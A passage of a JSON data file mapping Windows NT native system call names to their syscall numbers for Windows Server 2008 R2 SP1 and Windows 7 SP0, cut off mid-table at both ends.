184, "NtDrawText": 185, "NtEnableLastKnownGood": 186, "NtEnumerateBootEntries": 187, "NtEnumerateDriverEntries": 188, "NtEnumerateSystemEnvironmentValuesEx": 189, "NtEnumerateTransactionObject": 190, "NtExtendSection": 191, "NtFilterToken": 192, "NtFlushInstallUILanguage": 193, "NtFlushInstructionCache": 194, "NtFlushKey": 195, "NtFlushProcessWriteBuffers": 196, "NtFlushVirtualMemory": 197, "NtFlushWriteBuffer": 198, "NtFreeUserPhysicalPages": 199, "NtFreezeRegistry": 200, "NtFreezeTransactions": 201, "NtGetContextThread": 202, "NtGetCurrentProcessorNumber": 203, "NtGetDevicePowerState": 204, "NtGetMUIRegistryInfo": 205, "NtGetNextProcess": 206, "NtGetNextThread": 207, "NtGetNlsSectionPtr": 208, "NtGetNotificationResourceManager": 209, "NtGetPlugPlayEvent": 210, "NtGetWriteWatch": 211, "NtImpersonateAnonymousToken": 212, "NtImpersonateThread": 213, "NtInitializeNlsFiles": 214, "NtInitializeRegistry": 215, "NtInitiatePowerAction": 216, "NtIsSystemResumeAutomatic": 217, "NtIsUILanguageComitted": 218, "NtListenPort": 219, "NtLoadDriver": 220, "NtLoadKey": 221, "NtLoadKey2": 222, "NtLoadKeyEx": 223, "NtLockFile": 224, "NtLockProductActivationKeys": 225, "NtLockRegistryKey": 226, "NtLockVirtualMemory": 227, "NtMakePermanentObject": 228, "NtMakeTemporaryObject": 229, "NtMapCMFModule": 230, "NtMapUserPhysicalPages": 231, "NtModifyBootEntry": 232, "NtModifyDriverEntry": 233, "NtNotifyChangeDirectoryFile": 234, "NtNotifyChangeKey": 235, "NtNotifyChangeMultipleKeys": 236, "NtNotifyChangeSession": 237, "NtOpenEnlistment": 238, "NtOpenEventPair": 239, "NtOpenIoCompletion": 240, "NtOpenJobObject": 241, "NtOpenKeyEx": 242, "NtOpenKeyTransacted": 243, "NtOpenKeyTransactedEx": 244, "NtOpenKeyedEvent": 245, "NtOpenMutant": 246, "NtOpenObjectAuditAlarm": 247, "NtOpenPrivateNamespace": 248, "NtOpenProcessToken": 249, "NtOpenResourceManager": 250, "NtOpenSemaphore": 251, "NtOpenSession": 252, "NtOpenSymbolicLinkObject": 253, "NtOpenThread": 254, "NtOpenTimer": 255, "NtOpenTransaction": 256, "NtOpenTransactionManager": 257, "NtPlugPlayControl": 258, "NtPrePrepareComplete": 259, "NtPrePrepareEnlistment": 260, "NtPrepareComplete": 261, "NtPrepareEnlistment": 262, "NtPrivilegeCheck": 263, "NtPrivilegeObjectAuditAlarm": 264, "NtPrivilegedServiceAuditAlarm": 265, "NtPropagationComplete": 266, "NtPropagationFailed": 267, "NtPulseEvent": 268, "NtQueryBootEntryOrder": 269, "NtQueryBootOptions": 270, "NtQueryDebugFilterState": 271, "NtQueryDirectoryObject": 272, "NtQueryDriverEntryOrder": 273, "NtQueryEaFile": 274, "NtQueryFullAttributesFile": 275, "NtQueryInformationAtom": 276, "NtQueryInformationEnlistment": 277, "NtQueryInformationJobObject": 278, "NtQueryInformationPort": 279, "NtQueryInformationResourceManager": 280, "NtQueryInformationTransaction": 281, "NtQueryInformationTransactionManager": 282, "NtQueryInformationWorkerFactory": 283, "NtQueryInstallUILanguage": 284, "NtQueryIntervalProfile": 285, "NtQueryIoCompletion": 286, "NtQueryLicenseValue": 287, "NtQueryMultipleValueKey": 288, "NtQueryMutant": 289, "NtQueryOpenSubKeys": 290, "NtQueryOpenSubKeysEx": 291, "NtQueryPortInformationProcess": 292, "NtQueryQuotaInformationFile": 293, "NtQuerySecurityAttributesToken": 294, "NtQuerySecurityObject": 295, "NtQuerySemaphore": 296, "NtQuerySymbolicLinkObject": 297, "NtQuerySystemEnvironmentValue": 298, "NtQuerySystemEnvironmentValueEx": 299, "NtQuerySystemInformationEx": 300, "NtQueryTimerResolution": 301, "NtQueueApcThreadEx": 302, "NtRaiseException": 303, "NtRaiseHardError": 304, "NtReadOnlyEnlistment": 305, "NtRecoverEnlistment": 306, "NtRecoverResourceManager": 307, "NtRecoverTransactionManager": 308, "NtRegisterProtocolAddressInformation": 309, "NtRegisterThreadTerminatePort": 310, "NtReleaseKeyedEvent": 311, "NtReleaseWorkerFactoryWorker": 312, "NtRemoveIoCompletionEx": 313, "NtRemoveProcessDebug": 314, "NtRenameKey": 315, "NtRenameTransactionManager": 316, "NtReplaceKey": 317, "NtReplacePartitionUnit": 318, "NtReplyWaitReplyPort": 319, "NtRequestPort": 320, "NtResetEvent": 321, "NtResetWriteWatch": 322, "NtRestoreKey": 323, "NtResumeProcess": 324, "NtRollbackComplete": 325, "NtRollbackEnlistment": 326, "NtRollbackTransaction": 327, "NtRollforwardTransactionManager": 328, "NtSaveKey": 329, "NtSaveKeyEx": 330, "NtSaveMergedKeys": 331, "NtSecureConnectPort": 332, "NtSerializeBoot": 333, "NtSetBootEntryOrder": 334, "NtSetBootOptions": 335, "NtSetContextThread": 336, "NtSetDebugFilterState": 337, "NtSetDefaultHardErrorPort": 338, "NtSetDefaultLocale": 339, "NtSetDefaultUILanguage": 340, "NtSetDriverEntryOrder": 341, "NtSetEaFile": 342, "NtSetHighEventPair": 343, "NtSetHighWaitLowEventPair": 344, "NtSetInformationDebugObject": 345, "NtSetInformationEnlistment": 346, "NtSetInformationJobObject": 347, "NtSetInformationKey": 348, "NtSetInformationResourceManager": 349, "NtSetInformationToken": 350, "NtSetInformationTransaction": 351, "NtSetInformationTransactionManager": 352, "NtSetInformationWorkerFactory": 353, "NtSetIntervalProfile": 354, "NtSetIoCompletion": 355, "NtSetIoCompletionEx": 356, "NtSetLdtEntries": 357, "NtSetLowEventPair": 358, "NtSetLowWaitHighEventPair": 359, "NtSetQuotaInformationFile": 360, "NtSetSecurityObject": 361, "NtSetSystemEnvironmentValue": 362, "NtSetSystemEnvironmentValueEx": 363, "NtSetSystemInformation": 364, "NtSetSystemPowerState": 365, "NtSetSystemTime": 366, "NtSetThreadExecutionState": 367, "NtSetTimerEx": 368, "NtSetTimerResolution": 369, "NtSetUuidSeed": 370, "NtSetVolumeInformationFile": 371, "NtShutdownSystem": 372, "NtShutdownWorkerFactory": 373, "NtSignalAndWaitForSingleObject": 374, "NtSinglePhaseReject": 375, "NtStartProfile": 376, "NtStopProfile": 377, "NtSuspendProcess": 378, "NtSuspendThread": 379, "NtSystemDebugControl": 380, "NtTerminateJobObject": 381, "NtTestAlert": 382, "NtThawRegistry": 383, "NtThawTransactions": 384, "NtTraceControl": 385, "NtTranslateFilePath": 386, "NtUmsThreadYield": 387, "NtUnloadDriver": 388, "NtUnloadKey": 389, "NtUnloadKey2": 390, "NtUnloadKeyEx": 391, "NtUnlockFile": 392, "NtUnlockVirtualMemory": 393, "NtVdmControl": 394, "NtWaitForDebugEvent": 395, "NtWaitForKeyedEvent": 396, "NtWaitForWorkViaWorkerFactory": 397, "NtWaitHighEventPair": 398, "NtWaitLowEventPair": 399, "NtWorkerFactoryWorkerReady": 400}, "R2 SP1": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateReserveObject": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelIoFileEx": 134, "NtCancelSynchronousIoFile": 135, "NtCommitComplete": 136, "NtCommitEnlistment": 137, "NtCommitTransaction": 138, "NtCompactKeys": 139, "NtCompareTokens": 140, "NtCompleteConnectPort": 141, "NtCompressKey": 142, "NtConnectPort": 143, "NtCreateDebugObject": 144, "NtCreateDirectoryObject": 145, "NtCreateEnlistment": 146, "NtCreateEventPair": 147, "NtCreateIoCompletion": 148, "NtCreateJobObject": 149, "NtCreateJobSet": 150, "NtCreateKeyTransacted": 151, "NtCreateKeyedEvent": 152, "NtCreateMailslotFile": 153, "NtCreateMutant": 154, "NtCreateNamedPipeFile": 155, "NtCreatePagingFile": 156, "NtCreatePort": 157, "NtCreatePrivateNamespace": 158, "NtCreateProcess": 159, "NtCreateProfile": 160, "NtCreateProfileEx": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisableLastKnownGood": 183, "NtDisplayString": 184, "NtDrawText": 185, "NtEnableLastKnownGood": 186, "NtEnumerateBootEntries": 187, "NtEnumerateDriverEntries": 188, "NtEnumerateSystemEnvironmentValuesEx": 189, "NtEnumerateTransactionObject": 190, "NtExtendSection": 191, "NtFilterToken": 192, "NtFlushInstallUILanguage": 193, "NtFlushInstructionCache": 194, "NtFlushKey": 195, "NtFlushProcessWriteBuffers": 196, "NtFlushVirtualMemory": 197, "NtFlushWriteBuffer": 198, "NtFreeUserPhysicalPages": 199, "NtFreezeRegistry": 200, "NtFreezeTransactions": 201, "NtGetContextThread": 202, "NtGetCurrentProcessorNumber": 203, "NtGetDevicePowerState": 204, "NtGetMUIRegistryInfo": 205, "NtGetNextProcess": 206, "NtGetNextThread": 207, "NtGetNlsSectionPtr": 208, "NtGetNotificationResourceManager": 209, "NtGetPlugPlayEvent": 210, "NtGetWriteWatch": 211, "NtImpersonateAnonymousToken": 212, "NtImpersonateThread": 213, "NtInitializeNlsFiles": 214, "NtInitializeRegistry": 215, "NtInitiatePowerAction": 216, "NtIsSystemResumeAutomatic": 217, "NtIsUILanguageComitted": 218, "NtListenPort": 219, "NtLoadDriver": 220, "NtLoadKey": 221, "NtLoadKey2": 222, "NtLoadKeyEx": 223, "NtLockFile": 224, "NtLockProductActivationKeys": 225, "NtLockRegistryKey": 226, "NtLockVirtualMemory": 227, "NtMakePermanentObject": 228, "NtMakeTemporaryObject": 229, "NtMapCMFModule": 230, "NtMapUserPhysicalPages": 231, "NtModifyBootEntry": 232, "NtModifyDriverEntry": 233, "NtNotifyChangeDirectoryFile": 234, "NtNotifyChangeKey": 235, "NtNotifyChangeMultipleKeys": 236, "NtNotifyChangeSession": 237, "NtOpenEnlistment": 238, "NtOpenEventPair": 239, "NtOpenIoCompletion": 240, "NtOpenJobObject": 241, "NtOpenKeyEx": 242, "NtOpenKeyTransacted": 243, "NtOpenKeyTransactedEx": 244, "NtOpenKeyedEvent": 245, "NtOpenMutant": 246, "NtOpenObjectAuditAlarm": 247, "NtOpenPrivateNamespace": 248, "NtOpenProcessToken": 249, "NtOpenResourceManager": 250, "NtOpenSemaphore": 251, "NtOpenSession": 252, "NtOpenSymbolicLinkObject": 253, "NtOpenThread": 254, "NtOpenTimer": 255, "NtOpenTransaction": 256, "NtOpenTransactionManager": 257, "NtPlugPlayControl": 258, "NtPrePrepareComplete": 259, "NtPrePrepareEnlistment": 260, "NtPrepareComplete": 261, "NtPrepareEnlistment": 262, "NtPrivilegeCheck": 263, "NtPrivilegeObjectAuditAlarm": 264, "NtPrivilegedServiceAuditAlarm": 265, "NtPropagationComplete": 266, "NtPropagationFailed": 267, "NtPulseEvent": 268, "NtQueryBootEntryOrder": 269, "NtQueryBootOptions": 270, "NtQueryDebugFilterState": 271, "NtQueryDirectoryObject": 272, "NtQueryDriverEntryOrder": 273, "NtQueryEaFile": 274, "NtQueryFullAttributesFile": 275, "NtQueryInformationAtom": 276, "NtQueryInformationEnlistment": 277, "NtQueryInformationJobObject": 278, "NtQueryInformationPort": 279, "NtQueryInformationResourceManager": 280, "NtQueryInformationTransaction": 281, "NtQueryInformationTransactionManager": 282, "NtQueryInformationWorkerFactory": 283, "NtQueryInstallUILanguage": 284, "NtQueryIntervalProfile": 285, "NtQueryIoCompletion": 286, "NtQueryLicenseValue": 287, "NtQueryMultipleValueKey": 288, "NtQueryMutant": 289, "NtQueryOpenSubKeys": 290, "NtQueryOpenSubKeysEx": 291, "NtQueryPortInformationProcess": 292, "NtQueryQuotaInformationFile": 293, "NtQuerySecurityAttributesToken": 294, "NtQuerySecurityObject": 295, "NtQuerySemaphore": 296, "NtQuerySymbolicLinkObject": 297, "NtQuerySystemEnvironmentValue": 298, "NtQuerySystemEnvironmentValueEx": 299, "NtQuerySystemInformationEx": 300, "NtQueryTimerResolution": 301, "NtQueueApcThreadEx": 302, "NtRaiseException": 303, "NtRaiseHardError": 304, "NtReadOnlyEnlistment": 305, "NtRecoverEnlistment": 306, "NtRecoverResourceManager": 307, "NtRecoverTransactionManager": 308, "NtRegisterProtocolAddressInformation": 309, "NtRegisterThreadTerminatePort": 310, "NtReleaseKeyedEvent": 311, "NtReleaseWorkerFactoryWorker": 312, "NtRemoveIoCompletionEx": 313, "NtRemoveProcessDebug": 314, "NtRenameKey": 315, "NtRenameTransactionManager": 316, "NtReplaceKey": 317, "NtReplacePartitionUnit": 318, "NtReplyWaitReplyPort": 319, "NtRequestPort": 320, "NtResetEvent": 321, "NtResetWriteWatch": 322, "NtRestoreKey": 323, "NtResumeProcess": 324, "NtRollbackComplete": 325, "NtRollbackEnlistment": 326, "NtRollbackTransaction": 327, "NtRollforwardTransactionManager": 328, "NtSaveKey": 329, "NtSaveKeyEx": 330, "NtSaveMergedKeys": 331, "NtSecureConnectPort": 332, "NtSerializeBoot": 333, "NtSetBootEntryOrder": 334, "NtSetBootOptions": 335, "NtSetContextThread": 336, "NtSetDebugFilterState": 337, "NtSetDefaultHardErrorPort": 338, "NtSetDefaultLocale": 339, "NtSetDefaultUILanguage": 340, "NtSetDriverEntryOrder": 341, "NtSetEaFile": 342, "NtSetHighEventPair": 343, "NtSetHighWaitLowEventPair": 344, "NtSetInformationDebugObject": 345, "NtSetInformationEnlistment": 346, "NtSetInformationJobObject": 347, "NtSetInformationKey": 348, "NtSetInformationResourceManager": 349, "NtSetInformationToken": 350, "NtSetInformationTransaction": 351, "NtSetInformationTransactionManager": 352, "NtSetInformationWorkerFactory": 353, "NtSetIntervalProfile": 354, "NtSetIoCompletion": 355, "NtSetIoCompletionEx": 356, "NtSetLdtEntries": 357, "NtSetLowEventPair": 358, "NtSetLowWaitHighEventPair": 359, "NtSetQuotaInformationFile": 360, "NtSetSecurityObject": 361, "NtSetSystemEnvironmentValue": 362, "NtSetSystemEnvironmentValueEx": 363, "NtSetSystemInformation": 364, "NtSetSystemPowerState": 365, "NtSetSystemTime": 366, "NtSetThreadExecutionState": 367, "NtSetTimerEx": 368, "NtSetTimerResolution": 369, "NtSetUuidSeed": 370, "NtSetVolumeInformationFile": 371, "NtShutdownSystem": 372, "NtShutdownWorkerFactory": 373, "NtSignalAndWaitForSingleObject": 374, "NtSinglePhaseReject": 375, "NtStartProfile": 376, "NtStopProfile": 377, "NtSuspendProcess": 378, "NtSuspendThread": 379, "NtSystemDebugControl": 380, "NtTerminateJobObject": 381, "NtTestAlert": 382, "NtThawRegistry": 383, "NtThawTransactions": 384, "NtTraceControl": 385, "NtTranslateFilePath": 386, "NtUmsThreadYield": 387, "NtUnloadDriver": 388, "NtUnloadKey": 389, "NtUnloadKey2": 390, "NtUnloadKeyEx": 391, "NtUnlockFile": 392, "NtUnlockVirtualMemory": 393, "NtVdmControl": 394, "NtWaitForDebugEvent": 395, "NtWaitForKeyedEvent": 396, "NtWaitForWorkViaWorkerFactory": 397, "NtWaitHighEventPair": 398, "NtWaitLowEventPair": 399, "NtWorkerFactoryWorkerReady": 400}}, "Windows 7": {"SP0": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateReserveObject": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelIoFileEx": 134, "NtCancelSynchronousIoFile": 135, "NtCommitComplete": 136, "NtCommitEnlistment": 137, "NtCommitTransaction": 138, "NtCompactKeys": 139, "NtCompareTokens": 140, "NtCompleteConnectPort": 141, "NtCompressKey": 142, "NtConnectPort": 143, "NtCreateDebugObject": 144, "NtCreateDirectoryObject": 145, "NtCreateEnlistment": 146, "NtCreateEventPair": 147, "NtCreateIoCompletion": 148, "NtCreateJobObject": 149, "NtCreateJobSet": 150, "NtCreateKeyTransacted": 151, "NtCreateKeyedEvent": 152, "NtCreateMailslotFile": 153, "NtCreateMutant": 154, "NtCreateNamedPipeFile": 155, "NtCreatePagingFile": 156, "NtCreatePort": 157, "NtCreatePrivateNamespace": 158, "NtCreateProcess": 159, "NtCreateProfile": 160, "NtCreateProfileEx": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisableLastKnownGood": 183, "NtDisplayString": 184, "NtDrawText": 185, "NtEnableLastKnownGood": 186, "NtEnumerateBootEntries": 187, "NtEnumerateDriverEntries": 188, "NtEnumerateSystemEnvironmentValuesEx": 189, "NtEnumerateTransactionObject": 190, "NtExtendSection": 191, "NtFilterToken": 192, "NtFlushInstallUILanguage": 193, "NtFlushInstructionCache": 194, "NtFlushKey": 195, "NtFlushProcessWriteBuffers": 196, "NtFlushVirtualMemory": 197, "NtFlushWriteBuffer": 198, "NtFreeUserPhysicalPages": 199, "NtFreezeRegistry": 200, "NtFreezeTransactions": 201, "NtGetContextThread": 202, "NtGetCurrentProcessorNumber": 203, "NtGetDevicePowerState": 204, "NtGetMUIRegistryInfo": 205, "NtGetNextProcess": 206, "NtGetNextThread": 207, "NtGetNlsSectionPtr": 208, "NtGetNotificationResourceManager": 209, "NtGetPlugPlayEvent": 210, "NtGetWriteWatch": 211, "NtImpersonateAnonymousToken": 212, "NtImpersonateThread": 213, "NtInitializeNlsFiles": 214, "NtInitializeRegistry": 215, "NtInitiatePowerAction": 216, "NtIsSystemResumeAutomatic": 217, "NtIsUILanguageComitted": 218, "NtListenPort": 219, "NtLoadDriver": 220, "NtLoadKey": 221, "NtLoadKey2": 222, "NtLoadKeyEx": 223, "NtLockFile": 224, "NtLockProductActivationKeys": 225, "NtLockRegistryKey": 226, "NtLockVirtualMemory": 227, "NtMakePermanentObject": 228, "NtMakeTemporaryObject": 229, "NtMapCMFModule": 230, "NtMapUserPhysicalPages": 231, "NtModifyBootEntry": 232, "NtModifyDriverEntry": 233, "NtNotifyChangeDirectoryFile": 234, "NtNotifyChangeKey": 235, "NtNotifyChangeMultipleKeys": 236, "NtNotifyChangeSession": 237, "NtOpenEnlistment": 238, "NtOpenEventPair": 239, "NtOpenIoCompletion": 240, "NtOpenJobObject": 241, "NtOpenKeyEx": 242, "NtOpenKeyTransacted": 243, "NtOpenKeyTransactedEx": 244, "NtOpenKeyedEvent": 245, "NtOpenMutant": 246, "NtOpenObjectAuditAlarm": 247, "NtOpenPrivateNamespace": 248, "NtOpenProcessToken": 249, "NtOpenResourceManager": 250, "NtOpenSemaphore": 251, "NtOpenSession": 252, "NtOpenSymbolicLinkObject": 253, "NtOpenThread": 254, "NtOpenTimer": 255, "NtOpenTransaction": 256, "NtOpenTransactionManager": 257, "NtPlugPlayControl": 258, "NtPrePrepareComplete": 259, "NtPrePrepareEnlistment": 260, "NtPrepareComplete": 261, "NtPrepareEnlistment": 262, "NtPrivilegeCheck": 263, "NtPrivilegeObjectAuditAlarm": 264, "NtPrivilegedServiceAuditAlarm": 265, "NtPropagationComplete": 266, "NtPropagationFailed": 267, "NtPulseEvent": 268, "NtQueryBootEntryOrder": 269, "NtQueryBootOptions": 270, "NtQueryDebugFilterState": 271, "NtQueryDirectoryObject": 272, "NtQueryDriverEntryOrder": 273, "NtQueryEaFile": 274, "NtQueryFullAttributesFile": 275, "NtQueryInformationAtom": 276, "NtQueryInformationEnlistment": 277, "NtQueryInformationJobObject": 278, "NtQueryInformationPort": 279, "NtQueryInformationResourceManager": 280, "NtQueryInformationTransaction": 281, "NtQueryInformationTransactionManager": 282, "NtQueryInformationWorkerFactory": 283, "NtQueryInstallUILanguage": 284, "NtQueryIntervalProfile": 285, "NtQueryIoCompletion": 286, "NtQueryLicenseValue": 287, "NtQueryMultipleValueKey": 288, "NtQueryMutant": 289, "NtQueryOpenSubKeys": 290, "NtQueryOpenSubKeysEx": 291, "NtQueryPortInformationProcess": 292, "NtQueryQuotaInformationFile": 293, "NtQuerySecurityAttributesToken": 294, "NtQuerySecurityObject": 295, "NtQuerySemaphore": 296, "NtQuerySymbolicLinkObject": 297, "NtQuerySystemEnvironmentValue": 298, "NtQuerySystemEnvironmentValueEx": 299, "NtQuerySystemInformationEx": 300, "NtQueryTimerResolution": 301, "NtQueueApcThreadEx": 302, "NtRaiseException": 303, "NtRaiseHardError": 304, "NtReadOnlyEnlistment": 305, "NtRecoverEnlistment": 306, "NtRecoverResourceManager": 307, "NtRecoverTransactionManager": 308, "NtRegisterProtocolAddressInformation": 309, "NtRegisterThreadTerminatePort": 310, "NtReleaseKeyedEvent": 311, "NtReleaseWorkerFactoryWorker": 312, "NtRemoveIoCompletionEx": 313, "NtRemoveProcessDebug": 314, "NtRenameKey": 315, 